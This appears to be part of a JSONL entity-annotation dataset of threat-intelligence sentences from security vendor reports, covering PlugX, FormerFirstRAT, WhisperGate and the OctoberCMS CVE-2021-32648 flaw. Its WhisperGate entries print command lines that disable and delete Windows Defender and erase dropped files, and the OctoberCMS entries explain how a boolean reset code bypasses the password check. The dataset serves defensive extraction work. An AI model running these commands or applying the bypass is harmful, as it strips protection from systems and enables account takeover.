messages.","entities":[{"id":44908,"label":"identity","start_offset":12,"end_offset":20}],"relations":[],"Comments":[]} +{"id":5241,"text":"AnubisSpy has several modules, each of which has a separate role.","entities":[{"id":51275,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":4752,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[],"relations":[],"Comments":[]} +{"id":14218,"text":"Although gzwrite64 is imported by loadperf.dll, the payload\u2019s main function is actually located in the DLLMain of \u201cloadoerf.ini\u201d.","entities":[{"id":48244,"label":"FILEPATH","start_offset":115,"end_offset":127},{"id":48246,"label":"FILEPATH","start_offset":34,"end_offset":46},{"id":48247,"label":"SOFTWARE","start_offset":9,"end_offset":19}],"relations":[],"Comments":[]} +{"id":14361,"text":"The following figures show how Maikspy variants from 2016 to 2018 are connected to C&C servers (found in this appendix, along with the Android and Windows hashes) used by the attackers: Figure 20.","entities":[{"id":51783,"label":"malware","start_offset":31,"end_offset":38},{"id":51784,"label":"SOFTWARE","start_offset":135,"end_offset":142},{"id":51785,"label":"SOFTWARE","start_offset":147,"end_offset":154}],"relations":[],"Comments":[]} +{"id":4207,"text":"This time, the threat actor seems to have a new modus operandi, setting up two new websites and new payloads with which to compromise its targets.","entities":[],"relations":[],"Comments":[]} +{"id":5478,"text":"The chat logs shed light on the social engineering used by the operators to persuade victims to install the cyberespionage malware on their Android devices.","entities":[{"id":51470,"label":"SOFTWARE","start_offset":140,"end_offset":147},{"id":51469,"label":"attack-pattern","start_offset":32,"end_offset":50}],"relations":[],"Comments":[]} +{"id":3249,"text":"This file contains the victim ID assigned by the command-and-control (C&C) server.","entities":[],"relations":[],"Comments":[]} +{"id":10468,"text":"If the link was not active, the user was redirected directly to a legitimate website.","entities":[],"relations":[],"Comments":[]} +{"id":3514,"text":"Protux:","entities":[{"id":10643,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":1290,"text":"It attempts to obtain a handle to this window using the FindWindowW API call and then proceeds to send the following command to this executable.","entities":[],"relations":[],"Comments":[]} -{"id":1291,"text":"This allows the malware to indirectly execute a command within the cmd.exe process.","entities":[{"id":3938,"label":"malware","start_offset":67,"end_offset":74}],"relations":[],"Comments":[]} -{"id":1292,"text":" This registry key will ensure an executable that it later downloads is configured to persist across reboots.","entities":[],"relations":[],"Comments":[]} -{"id":1293,"text":"It then sends the 'exit' command to this executable, which will kill this particular process.","entities":[],"relations":[],"Comments":[]} -{"id":1294,"text":" The malware then attempts to read the following file.","entities":[],"relations":[],"Comments":[]} -{"id":1295,"text":"This file is used to store a key that is later used to decrypt data received during network communications.","entities":[],"relations":[],"Comments":[]} -{"id":1296,"text":" If the file does not exist, it will make the following GET request: The filename and name parameters are statically set in the above request.","entities":[],"relations":[],"Comments":[]} -{"id":1297,"text":"The server responds with data similar to the following: The first two pieces of data ('17' and 'gh204503254') are then written to the ibmCon6.tmp file referenced earlier.","entities":[{"id":46662,"label":"FILEPATH","start_offset":135,"end_offset":146}],"relations":[],"Comments":[]} -{"id":1298,"text":" The malware will copy itself to the %TEMP% directory with the executable name of 'notilv.exe'.","entities":[{"id":46663,"label":"FILEPATH","start_offset":37,"end_offset":43},{"id":46664,"label":"FILEPATH","start_offset":83,"end_offset":93}],"relations":[],"Comments":[]} -{"id":1299,"text":"Due to the previously written registry key, this file will execute when the machine is restarted and the current user logs in.","entities":[],"relations":[],"Comments":[]} -{"id":1300,"text":" The malware then makes the following request: The filename and uid parameters are statically set in the above request.","entities":[],"relations":[],"Comments":[]} -{"id":1301,"text":"The response data is decrypted using the RC4 cryptographic stream cipher.","entities":[],"relations":[],"Comments":[]} -{"id":1302,"text":"The 'gh204503254' data that was previously downloaded is used as the key.","entities":[],"relations":[],"Comments":[]} -{"id":1303,"text":"The following Python code can be used for decryption, using the 'gh204503254' key: At this stage, the remote server can send a number of different responses.","entities":[],"relations":[],"Comments":[]} -{"id":1304,"text":"The following example response will instruct the malware to download a remote executable file: 'filename.exe' is the path where the downloaded file will be stored, and '01234567890123456789012345678901' is the value supplied in the subsequent HTTP request.","entities":[{"id":46665,"label":"FILEPATH","start_offset":97,"end_offset":109}],"relations":[],"Comments":[]} -{"id":1305,"text":"When this command is received, the following example request is made:","entities":[],"relations":[],"Comments":[]} -{"id":1306,"text":" At this point, the remote server will respond with an unencrypted file that the malware saves to the system.","entities":[],"relations":[],"Comments":[]} -{"id":1307,"text":" The remote server can also send the following example response.","entities":[],"relations":[],"Comments":[]} -{"id":1308,"text":"This response will instruct the malware to upload the specified file:","entities":[],"relations":[],"Comments":[]} -{"id":1309,"text":" An example upload request can be seen below: The remote server can also send the following example response.","entities":[],"relations":[],"Comments":[]} -{"id":1310,"text":"This response will instruct the malware to execute the given command: The results of this -execution are stored in a temporary text file in the %TEMP% directory.","entities":[{"id":46666,"label":"FILEPATH","start_offset":145,"end_offset":151}],"relations":[],"Comments":[]} -{"id":1311,"text":"These results are encrypted using the same technique mentioned previously.","entities":[],"relations":[],"Comments":[]} -{"id":1312,"text":"An example upload of these results can be seen below: PlugX PlugX is a backdoor that is often used by actors in targeted attacks.","entities":[{"id":3977,"label":"malware","start_offset":55,"end_offset":60},{"id":3978,"label":"malware","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} -{"id":1313,"text":"This version of PlugX attempts to disguise itself as a Symantec product.","entities":[{"id":3979,"label":"malware","start_offset":16,"end_offset":21},{"id":46667,"label":"identity","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} -{"id":1314,"text":"The following icon is present in this sample: Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":1315,"text":"PlugX file uses Symantec logo icon.","entities":[{"id":3983,"label":"malware","start_offset":0,"end_offset":5},{"id":46668,"label":"identity","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} -{"id":1316,"text":" Upon execution, the malware will install itself as a service with the following parameters: It may also set the following registry key for persistence:","entities":[],"relations":[],"Comments":[]} -{"id":1317,"text":" PlugX is a well-studied malware family with a long history of use in targeted attacks.","entities":[{"id":44968,"label":"malware","start_offset":1,"end_offset":6}],"relations":[],"Comments":[]} -{"id":1318,"text":"More information on its history is available at the following links.","entities":[],"relations":[],"Comments":[]} -{"id":1319,"text":" FormerFirstRAT This remote administration tool (RAT) is referred to as “FormerFirstRAT” by its authors.","entities":[{"id":3989,"label":"malware","start_offset":1,"end_offset":15},{"id":3992,"label":"malware","start_offset":74,"end_offset":88}],"relations":[],"Comments":[]} -{"id":1320,"text":"FormerFirstRAT communicates using unencrypted HTTP over port 443; the use of mismatching ports and communication protocols is not uncommon in targeted attack campaigns.","entities":[{"id":3993,"label":"malware","start_offset":0,"end_offset":14},{"id":46669,"label":"campaign","start_offset":142,"end_offset":167}],"relations":[{"id":210,"from_id":46669,"to_id":3993,"type":"uses"}],"Comments":[]} -{"id":1321,"text":"In addition, port \/ protocol mis-match traffic can be an indicator of bad activity.","entities":[],"relations":[],"Comments":[]} -{"id":1322,"text":" When the malware starts, it writes the following registry key to ensure persistence: The malware then proceeds to send an HTTP POST request with information about the victim system.","entities":[],"relations":[],"Comments":[]} -{"id":1323,"text":"The following information is collected:","entities":[],"relations":[],"Comments":[]} -{"id":1324,"text":" The following settings are used for command and control: The malware encrypts network communication using the AES128 encryption cipher.","entities":[],"relations":[],"Comments":[]} -{"id":1325,"text":"It uses the MD5 of 'tucwatkins' in order to generate the key.","entities":[],"relations":[],"Comments":[]} -{"id":1326,"text":"All data is sent via HTTP POST requests.","entities":[],"relations":[],"Comments":[]} -{"id":1327,"text":"While not a distinct TTP, the author of this malware may be a soap-opera fan.","entities":[],"relations":[],"Comments":[]} -{"id":1328,"text":"The following code demonstrates how you can decrypt the malware communications using Python: The malware then enters a loop where it will send out periodic requests to the remote server.","entities":[],"relations":[],"Comments":[]} -{"id":1329,"text":"The remote server has the ability to respond and provide instructions to the RAT.","entities":[],"relations":[],"Comments":[]} -{"id":1330,"text":"We have identified the following functionalities:","entities":[],"relations":[],"Comments":[]} -{"id":1331,"text":" An example HTTP POST request can be seen below. NFlog When loaded inside of a running process, NFlog begins by spawning a new thread.","entities":[{"id":4011,"label":"malware","start_offset":50,"end_offset":55},{"id":4012,"label":"malware","start_offset":98,"end_offset":103}],"relations":[],"Comments":[]} -{"id":1332,"text":"This new thread is responsible for all malicious activities produced by this DLL.","entities":[],"relations":[],"Comments":[]} -{"id":1333,"text":"Initially, the malware will set the following registry key: Where [current_executable_filename] is the path to the current running executable, which is acquired via a call to GetModuleFileNameA.","entities":[],"relations":[],"Comments":[]} -{"id":1334,"text":"This registry key ensures that the malware will persist across reboots when the current user logs in.","entities":[],"relations":[],"Comments":[]} -{"id":1335,"text":" Multiple string obfuscation routines are included in this malware sample.","entities":[],"relations":[],"Comments":[]} -{"id":1336,"text":"Strings contained in the binary are decrypted via a simple binary XOR against a single byte key of 0x25.","entities":[],"relations":[],"Comments":[]} -{"id":1337,"text":" The malware proceeds to create a named event object of 'GoogleZCM' and uses this event in order to ensure only one instance of this malware is running at a given time.","entities":[],"relations":[],"Comments":[]} -{"id":1338,"text":" The malware proceeds to make an attempt at binding to the local host on port 1139.","entities":[],"relations":[],"Comments":[]} -{"id":1339,"text":" The malware attempts to ensure Internet connectivity by making a request to www.microsoft.com.","entities":[{"id":46670,"label":"DOMAIN","start_offset":77,"end_offset":94}],"relations":[],"Comments":[]} -{"id":1340,"text":"An example request is shown below.","entities":[],"relations":[],"Comments":[]} -{"id":1341,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1342,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":1343,"text":"This post is also available in: 日本語 (Japanese) Beginning on Jan. 14, 2022, reports began emerging about a series of attacks targeting numerous Ukrainian government websites.","entities":[{"id":46672,"label":"identity","start_offset":149,"end_offset":169},{"id":46671,"label":"TIME","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} -{"id":1344,"text":"As a result of these attacks, numerous government websites were found to be either defaced or inaccessible.","entities":[],"relations":[],"Comments":[]} -{"id":1346,"text":"A day later, public reporting outlined new malware called WhisperGate that originally was observed on Jan. 13, 2022.","entities":[{"id":46675,"label":"TIME","start_offset":102,"end_offset":115},{"id":46676,"label":"malware","start_offset":58,"end_offset":69}],"relations":[],"Comments":[]} -{"id":1347,"text":"This malware disables Windows Defender Threat Protection, is destructive in nature and was discovered to have targeted multiple organizations in Ukraine.","entities":[{"id":44970,"label":"SOFTWARE","start_offset":22,"end_offset":56},{"id":44971,"label":"location","start_offset":145,"end_offset":152}],"relations":[],"Comments":[]} -{"id":1348,"text":"Microsoft has publicly attributed the use of this custom malware to a threat actor they refer to as DEV-0586.","entities":[{"id":4045,"label":"threat-actor","start_offset":100,"end_offset":108},{"id":46677,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":1349,"text":" Though both attacks have targeted Ukrainian organizations, the two threats have so far been implemented in separate situations.","entities":[{"id":46678,"label":"identity","start_offset":35,"end_offset":58}],"relations":[],"Comments":[]} -{"id":1350,"text":" As a result of these events, Palo Alto Networks researchers took immediate action to ensure that customers anywhere in the world can be appropriately protected against these reported threats, however they may be exploited.","entities":[{"id":44972,"label":"identity","start_offset":30,"end_offset":48}],"relations":[],"Comments":[]} -{"id":1351,"text":"These attacks ultimately resulted in the investigation of the following two threats: Palo Alto Networks customers can use Xpanse or Threat Prevention for the Next-Generation Firewall to identify vulnerable and\/or internet-facing instances of OctoberCMS.","entities":[{"id":46679,"label":"identity","start_offset":86,"end_offset":104},{"id":46680,"label":"SOFTWARE","start_offset":123,"end_offset":129},{"id":46681,"label":"SOFTWARE","start_offset":133,"end_offset":150},{"id":46682,"label":"SOFTWARE","start_offset":243,"end_offset":253}],"relations":[],"Comments":[]} -{"id":1352,"text":"Protections against WhisperGate malware have been included in Cortex XDR, as well as in the WildFire and Advanced URL Filtering subscriptions for the Next-Generation Firewall.","entities":[{"id":4060,"label":"SOFTWARE","start_offset":92,"end_offset":100},{"id":4058,"label":"malware","start_offset":20,"end_offset":31},{"id":46683,"label":"SOFTWARE","start_offset":62,"end_offset":72}],"relations":[],"Comments":[]} -{"id":1353,"text":"There is a Cortex XSOAR pack available to assist with detecting and mitigating both threats.","entities":[{"id":44973,"label":"SOFTWARE","start_offset":11,"end_offset":23}],"relations":[],"Comments":[]} -{"id":1354,"text":" CVE-2021-32648 Vulnerability WhisperGate Malware Family Mitigation Actions Hunting for WhisperGate Conclusion Additional Resources","entities":[{"id":46685,"label":"malware","start_offset":30,"end_offset":41},{"id":46684,"label":"vulnerability","start_offset":1,"end_offset":15},{"id":46686,"label":"malware","start_offset":88,"end_offset":99}],"relations":[],"Comments":[]} -{"id":1355,"text":" The CVE-2021-32648 vulnerability lies within the OctoberCMS platform prior to version 1.0.472 and results in an attacker gaining access to any account via a specially crafted account password reset request.","entities":[{"id":46687,"label":"vulnerability","start_offset":5,"end_offset":19},{"id":46688,"label":"SOFTWARE","start_offset":50,"end_offset":60}],"relations":[{"id":211,"from_id":46688,"to_id":46687,"type":"has"}],"Comments":[]} -{"id":1356,"text":"This vulnerability is believed to have allowed threat actors to gain access to the underlying websites leveraged by the Ukraine government.","entities":[{"id":44974,"label":"identity","start_offset":120,"end_offset":138}],"relations":[],"Comments":[]} -{"id":1357,"text":" Once the vulnerability was discovered, Palo Alto Networks threat researchers quickly began reverse-engineering the patch that remediated this vulnerability and were able to produce a working proof of concept (PoC) in a very short time.","entities":[{"id":46689,"label":"identity","start_offset":40,"end_offset":58}],"relations":[],"Comments":[]} -{"id":1358,"text":"Later that day, a public PoC surfaced, allowing organizations to better understand this vulnerability and how it is exploited.","entities":[{"id":4075,"label":"TIME","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} -{"id":1359,"text":"Using our PoC, we created the following demonstration video of how a malicious actor would exploit the CVE-2021-32648 vulnerability, log into the compromised OctoberCMS account and to deface a web page hosted by the server:","entities":[{"id":44975,"label":"vulnerability","start_offset":103,"end_offset":117},{"id":44976,"label":"SOFTWARE","start_offset":158,"end_offset":168}],"relations":[{"id":49,"from_id":44976,"to_id":44975,"type":"has"}],"Comments":[]} -{"id":1360,"text":"To determine how this vulnerability was exploited, we analyzed the patch that developers added to OctoberCMS version 1.0.472 to mitigate the CVE-2021-32648 vulnerability.","entities":[{"id":46690,"label":"vulnerability","start_offset":141,"end_offset":155},{"id":46692,"label":"SOFTWARE","start_offset":98,"end_offset":108}],"relations":[{"id":212,"from_id":46692,"to_id":46690,"type":"has"}],"Comments":[]} -{"id":1361,"text":"We discovered that the vulnerable code existed in the Auth\/Models\/User.php file within the October Rain library of OctoberCMS.","entities":[{"id":46693,"label":"FILEPATH","start_offset":54,"end_offset":74},{"id":46694,"label":"SOFTWARE","start_offset":115,"end_offset":125}],"relations":[],"Comments":[]} -{"id":1362,"text":"The code that exposes this vulnerability is within a function named checkResetPasswordCode, specifically, line 281 in User.php.","entities":[{"id":44977,"label":"FILEPATH","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} -{"id":1363,"text":"The following line of code attempts to validate the inbound password reset request by comparing the reset code submitted within the HTTP request with the reset code generated by OctoberCMS during a legitimate reset process: To exploit this vulnerability, the actor would simply supply a boolean true value as the reset code within a custom-crafted HTTP request to reset the password of an account.","entities":[{"id":46695,"label":"SOFTWARE","start_offset":178,"end_offset":188}],"relations":[],"Comments":[]} -{"id":1364,"text":"By supplying the boolean true, the comparison between boolean true and the reset code string results in a boolean true, even though the two variables have different types.","entities":[],"relations":[],"Comments":[]} -{"id":1365,"text":"This effectively validates the actor’s inbound password reset request, which allows the actor to then change the password To fix this vulnerability in version 1.0.472, the OctoberCMS developer changed the line of code above to use === instead of == when comparing the values of the reset code provided by the user via an HTTP POST request.","entities":[{"id":44978,"label":"SOFTWARE","start_offset":173,"end_offset":183}],"relations":[],"Comments":[]} -{"id":1366,"text":"The difference between === and == involves the === comparing the value and type of value of the variable, not just the value, as happens when using ==.","entities":[],"relations":[],"Comments":[]} -{"id":1367,"text":"To demonstrate the difference, the following two commands run PHP code to show that a comparison of the string code with boolean true using == results in a boolean true, while the same comparison using === results in a boolean false: As a result of the analysis of the CVE-2021-32648 vulnerability, various product protections were created or enhanced.","entities":[{"id":46696,"label":"vulnerability","start_offset":270,"end_offset":284}],"relations":[],"Comments":[]} -{"id":1368,"text":"More information about these protections can be found within the Mitigation Actions section of the briefing.","entities":[],"relations":[],"Comments":[]} -{"id":1369,"text":" First observed by Microsoft on Jan. 13, 2022, WhisperGate malware is computer network attack (CNA) malware aimed at deleting Microsoft Windows Defender and corrupting files on the target.","entities":[{"id":46699,"label":"identity","start_offset":19,"end_offset":29},{"id":46697,"label":"SOFTWARE","start_offset":126,"end_offset":152},{"id":46698,"label":"TIME","start_offset":32,"end_offset":45},{"id":46700,"label":"malware","start_offset":47,"end_offset":58}],"relations":[],"Comments":[]} -{"id":1370,"text":"It consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload.","entities":[{"id":4118,"label":"identity","start_offset":122,"end_offset":131}],"relations":[],"Comments":[]} -{"id":1371,"text":"The in-memory code uses Living Off the Land Binaries (LOLBINs) to evade detection and also performs anti-analysis techniques, as it will fail to detonate when certain monitoring tools exist.","entities":[{"id":44979,"label":"tools","start_offset":24,"end_offset":62}],"relations":[],"Comments":[]} -{"id":1372,"text":"At the time of writing, there are two known samples identified as WhisperGate: Stage1.exe and Stage2.exe.","entities":[{"id":46701,"label":"malware","start_offset":66,"end_offset":77},{"id":46702,"label":"FILEPATH","start_offset":79,"end_offset":89},{"id":46703,"label":"FILEPATH","start_offset":94,"end_offset":104}],"relations":[],"Comments":[]} -{"id":1373,"text":"Stage1.exe purports to be ransomware, as it overwrites the target’s master boot record with 512 bytes and upon reboot displays the following ransom note: Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord’s content delivery network (CDN).","entities":[{"id":46706,"label":"FILEPATH","start_offset":155,"end_offset":165},{"id":46707,"label":"Infrastucture","start_offset":256,"end_offset":296},{"id":46705,"label":"FILEPATH","start_offset":0,"end_offset":10}],"relations":[{"id":213,"from_id":46706,"to_id":46707,"type":"beacons-to"}],"Comments":[]} -{"id":1374,"text":"Discord’s CDN is a user-created service that allows users to host attachments and is not malicious.","entities":[{"id":46708,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":1375,"text":"The hosted file is retrieved from the following URL: hxxps:\/\/cdn.discordapp[.]com\/attachments\/928503440139771947\/930108637681184768\/Tbopbh.jpg","entities":[{"id":46709,"label":"URL","start_offset":54,"end_offset":143}],"relations":[],"Comments":[]} -{"id":1376,"text":"File Tbopbh.jpg is the malicious payload that is in-memory loaded and kicks off the destructive capabilities.","entities":[{"id":46710,"label":"FILEPATH","start_offset":5,"end_offset":15}],"relations":[],"Comments":[]} -{"id":1377,"text":"The following patterns of activities are associated with this payload: 1. File InstallUtil.exe is copied to the host’s %TEMP% directory, e.g. C:\\Users\\[USERNAME]\\AppData\\Local\\Temp.","entities":[{"id":44981,"label":"FILEPATH","start_offset":80,"end_offset":95},{"id":44983,"label":"FILEPATH","start_offset":120,"end_offset":126},{"id":44982,"label":"FILEPATH","start_offset":143,"end_offset":181}],"relations":[],"Comments":[]} -{"id":1378,"text":"This file is a legitimate Microsoft Windows binary.","entities":[{"id":4137,"label":"identity","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} -{"id":1379,"text":"Two instances of PowerShell are spawned with an encoded command to sleep for 10 seconds, e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== 3.","entities":[{"id":46711,"label":"FILEPATH","start_offset":94,"end_offset":151},{"id":46712,"label":"tools","start_offset":17,"end_offset":27}],"relations":[],"Comments":[]} -{"id":1380,"text":"A Visual Basic Script (VBS) is created in C:\\Users\\[USERNAME]\\AppData\\Local\\Temp named: Nmddfrqqrbyjeygggda.vbs 4. Process wscript.exe is used to execute the VBS script in step 3.","entities":[{"id":44985,"label":"FILEPATH","start_offset":88,"end_offset":111},{"id":44986,"label":"FILEPATH","start_offset":124,"end_offset":135},{"id":44984,"label":"FILEPATH","start_offset":42,"end_offset":80}],"relations":[],"Comments":[]} -{"id":1381,"text":"The VBS script is used to call PowerShell to set Windows Defender exclusion path to C:\\ e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Set-MpPreference -ExclusionPath 'C:\\' 5. AdvancedRun.exe is created and written to the C:\\Users\\[USERNAME]\\AppData\\Local\\Temp directory. 6.","entities":[{"id":46713,"label":"FILEPATH","start_offset":84,"end_offset":87},{"id":46716,"label":"FILEPATH","start_offset":185,"end_offset":188},{"id":46718,"label":"tools","start_offset":49,"end_offset":65},{"id":46714,"label":"FILEPATH","start_offset":93,"end_offset":150},{"id":46715,"label":"FILEPATH","start_offset":194,"end_offset":209},{"id":46717,"label":"FILEPATH","start_offset":240,"end_offset":278},{"id":46719,"label":"tools","start_offset":31,"end_offset":41},{"id":46720,"label":"tools","start_offset":4,"end_offset":14}],"relations":[],"Comments":[]} -{"id":1382,"text":"AdvancedRun.exe is used to execute PowerShell.exe to delete and stop Windows Defender.","entities":[{"id":46721,"label":"FILEPATH","start_offset":0,"end_offset":15},{"id":46722,"label":"FILEPATH","start_offset":35,"end_offset":49},{"id":46723,"label":"SOFTWARE","start_offset":69,"end_offset":85}],"relations":[],"Comments":[]} -{"id":1383,"text":"The following command parameters are passed to AdvancedRun: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \/WindowState 0 \/CommandLine \"rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse\" \/StartDirectory \"\" \/RunAs 8 \/Run \"C:\\Users\\USERNAME]AppData\\Local\\Temp\\AdvancedRun.exe\" \/EXEFilename \"C:\\Windows\\System32\\sc.exe\" \/WindowState 0 \/CommandLine \"stop WinDefend\" \/StartDirectory \"\" \/RunAs 8 \/Run 7.","entities":[{"id":44990,"label":"FILEPATH","start_offset":313,"end_offset":339},{"id":44987,"label":"FILEPATH","start_offset":62,"end_offset":119},{"id":44988,"label":"FILEPATH","start_offset":157,"end_offset":198},{"id":44989,"label":"FILEPATH","start_offset":245,"end_offset":297},{"id":46724,"label":"SOFTWARE","start_offset":47,"end_offset":58}],"relations":[],"Comments":[]} -{"id":1384,"text":"PowerShell process used to delete Windows Defender, e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse 8. File InstallUtil.exe running from C:\\Users\\[USERNAME]\\AppData\\Local\\Temp directory.","entities":[{"id":4148,"label":"tools","start_offset":0,"end_offset":10},{"id":46727,"label":"FILEPATH","start_offset":122,"end_offset":163},{"id":46726,"label":"FILEPATH","start_offset":57,"end_offset":114},{"id":46728,"label":"FILEPATH","start_offset":183,"end_offset":198},{"id":46725,"label":"tools","start_offset":34,"end_offset":50},{"id":46729,"label":"FILEPATH","start_offset":212,"end_offset":251}],"relations":[],"Comments":[]} -{"id":1385,"text":"The in-memory payload (Tbopbh.jpg) is running within the context of the InstallUtil.exe process 9. Multiple instances of cmd.exe calling Ping.exe to delete file InstallUtil.exe, e.g. cmd.exe \/min \/C ping 111.111.111[.]111 -n 5 -w 10 > Nul & Del \/f \/q %TEMP%\\InstallUtil.exe 10. File AdvancedRun.exe is deleted from the C:\\Users\\[USERNAME]\\AppData\\Local\\Temp directory by the stage2.exe binary. 11. ICMP traffic to host: 111.111.111[.]111 12.","entities":[{"id":4149,"label":"malware","start_offset":122,"end_offset":129},{"id":4150,"label":"malware","start_offset":184,"end_offset":191},{"id":4151,"label":"tools","start_offset":200,"end_offset":204},{"id":4152,"label":"IPV4","start_offset":205,"end_offset":222},{"id":4154,"label":"IPV4","start_offset":423,"end_offset":440},{"id":46732,"label":"FILEPATH","start_offset":285,"end_offset":300},{"id":46730,"label":"FILEPATH","start_offset":23,"end_offset":33},{"id":46731,"label":"FILEPATH","start_offset":252,"end_offset":274},{"id":46733,"label":"FILEPATH","start_offset":321,"end_offset":387}],"relations":[],"Comments":[]} -{"id":1386,"text":"All files and directories, including those on mounted USB drives, excluding the floppy drive (A:) are targeted.","entities":[{"id":46734,"label":"FILEPATH","start_offset":94,"end_offset":96}],"relations":[],"Comments":[]} -{"id":1387,"text":"The following file extensions are overwritten with a one-byte value of 0xCC.","entities":[],"relations":[],"Comments":[]} -{"id":1388,"text":" 13. Targeted files greater than one megabyte are truncated to one megabyte when overwritten.","entities":[],"relations":[],"Comments":[]} -{"id":1389,"text":" 14. Virus & Threat protection is no longer available from Windows Security.","entities":[{"id":46735,"label":"SOFTWARE","start_offset":59,"end_offset":75}],"relations":[],"Comments":[]} -{"id":1390,"text":" Organizations running OctoberCMS prior to Build 472 and v1.1.5 are encouraged to update to the latest version.","entities":[{"id":46736,"label":"SOFTWARE","start_offset":23,"end_offset":33}],"relations":[],"Comments":[]} -{"id":1391,"text":"Additionally, in order for this vulnerability to be exploited, the web server must be running PHP below 7.4.","entities":[{"id":46737,"label":"SOFTWARE","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} -{"id":1392,"text":" Palo Alto Networks customers receive protections against the OctoberCMS vulnerability in the following ways: Palo Alto Networks customers receive protections against WhisperGate malware in the following ways: The Cortex XSOAR \"WhisperGate & CVE-2021-32648'' pack can help automatically detect and mitigate the two threats.","entities":[{"id":44991,"label":"identity","start_offset":1,"end_offset":19},{"id":44996,"label":"SOFTWARE","start_offset":216,"end_offset":228},{"id":44998,"label":"vulnerability","start_offset":244,"end_offset":258},{"id":44993,"label":"identity","start_offset":111,"end_offset":129},{"id":44994,"label":"vulnerability","start_offset":62,"end_offset":86},{"id":44995,"label":"malware","start_offset":168,"end_offset":179},{"id":4172,"label":"malware","start_offset":230,"end_offset":241}],"relations":[{"id":51,"from_id":44995,"to_id":44998,"type":"exploits"},{"id":214,"from_id":4172,"to_id":44998,"type":"exploits"}],"Comments":[]} -{"id":1393,"text":"Read more on the XSOAR marketplace.","entities":[],"relations":[],"Comments":[]} -{"id":1394,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":46738,"label":"identity","start_offset":92,"end_offset":99},{"id":46739,"label":"location","start_offset":131,"end_offset":144},{"id":46740,"label":"location","start_offset":185,"end_offset":189},{"id":46741,"label":"location","start_offset":208,"end_offset":212},{"id":46742,"label":"location","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} -{"id":1395,"text":" Palo Alto Networks Cortex XDR customers may leverage the following XQL queries, written by the Cortex Managed Threat Hunting service experts, to hunt their datasets for indicators related to WhisperGate malware: The Unit 42 Threat Intelligence team remains vigilant in monitoring this evolving situation, is actively hunting for known indicators from recent events and is ready to put protections in place to thwart attacks against our customers.","entities":[{"id":45003,"label":"malware","start_offset":192,"end_offset":203},{"id":45002,"label":"identity","start_offset":1,"end_offset":19},{"id":45001,"label":"SOFTWARE","start_offset":20,"end_offset":30},{"id":45004,"label":"identity","start_offset":218,"end_offset":225},{"id":46744,"label":"identity","start_offset":218,"end_offset":250},{"id":46745,"label":"identity","start_offset":96,"end_offset":133}],"relations":[],"Comments":[]} -{"id":1396,"text":" Product-specific protections have been implemented as a result of research performed in recent days, and those protections will be augmented as needed as more details come to light.","entities":[],"relations":[],"Comments":[]} -{"id":1397,"text":"Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":46746,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":1398,"text":" Updated March 4, 2022, at 6:15 a.m. PT.","entities":[{"id":45006,"label":"TIME","start_offset":9,"end_offset":39}],"relations":[],"Comments":[]} -{"id":1399,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1400,"text":"At 06:47 PST on May 20 Palo Alto Networks WildFire detected the start of the latest Kuluoz spam campaign.","entities":[{"id":4212,"label":"SOFTWARE","start_offset":42,"end_offset":50},{"id":46747,"label":"TIME","start_offset":3,"end_offset":22},{"id":46748,"label":"identity","start_offset":23,"end_offset":41},{"id":46749,"label":"campaign","start_offset":84,"end_offset":104}],"relations":[],"Comments":[]} -{"id":1401,"text":"The total number of e-mails detected quickly rose to over 30,000 per hour around noon PST and had not begun to slow down as of 1:30PM PST.","entities":[{"id":45007,"label":"TIME","start_offset":127,"end_offset":137},{"id":4218,"label":"TIME","start_offset":81,"end_offset":89}],"relations":[],"Comments":[]} -{"id":1402,"text":" Kuluoz is a descendant of the Asprox malware and spreads by sending copies of itself as an e-mail attachment.","entities":[{"id":46751,"label":"malware","start_offset":31,"end_offset":37},{"id":46750,"label":"malware","start_offset":1,"end_offset":7},{"id":46752,"label":"attack-pattern","start_offset":61,"end_offset":109}],"relations":[{"id":216,"from_id":46750,"to_id":46751,"type":"variant-of"},{"id":217,"from_id":46751,"to_id":46752,"type":"uses"},{"id":218,"from_id":46750,"to_id":46752,"type":"uses"}],"Comments":[]} -{"id":1403,"text":"As the malware infects more systems, the systems begin sending more e-mails which leads to more 